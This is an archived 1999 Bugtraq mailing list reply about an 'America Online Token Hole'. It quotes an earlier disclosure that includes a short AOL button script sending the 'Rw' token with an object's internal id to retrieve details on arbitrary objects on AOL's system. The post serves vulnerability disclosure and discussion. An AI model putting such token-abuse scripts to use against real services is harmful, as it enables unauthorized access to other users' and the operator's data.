Bugtraq mailing list archives

Re: America Online Token Hole


From: granny () PINKFLOYD COM (John Schuster)
Date: Mon, 12 Jul 1999 16:05:49 -0000


I had contacted the person who posted this information.  It 
seems that AOL has contacted him and he refuses to talk 
about this if you ask about it.

Does anyone have any information on how to make your own 
programmable buttons for AOL?

granny

About a year ago, I found out that by sending the "Rw" token 
to the AOL host while signed on along with the object's 
internal id as arg, any user could get detailed info about 
any object on the system.

man_start_object < trigger, "" >
mat_relative_tag < 22 >
act_replace_select_action
< 
uni_start_stream 
sm_send_token_arg <"Rw", INTERNAL ID HERE>
uni_end_stream 
>
mat_precise_x < 0 > 
mat_precise_y < 226 > 
mat_font_sis < small_fonts, 7, normal> 
mat_art_id < 1-0-21184 >
mat_bool_default < yes > 
man_end_object 

comments questions..   mackk () rpi edu

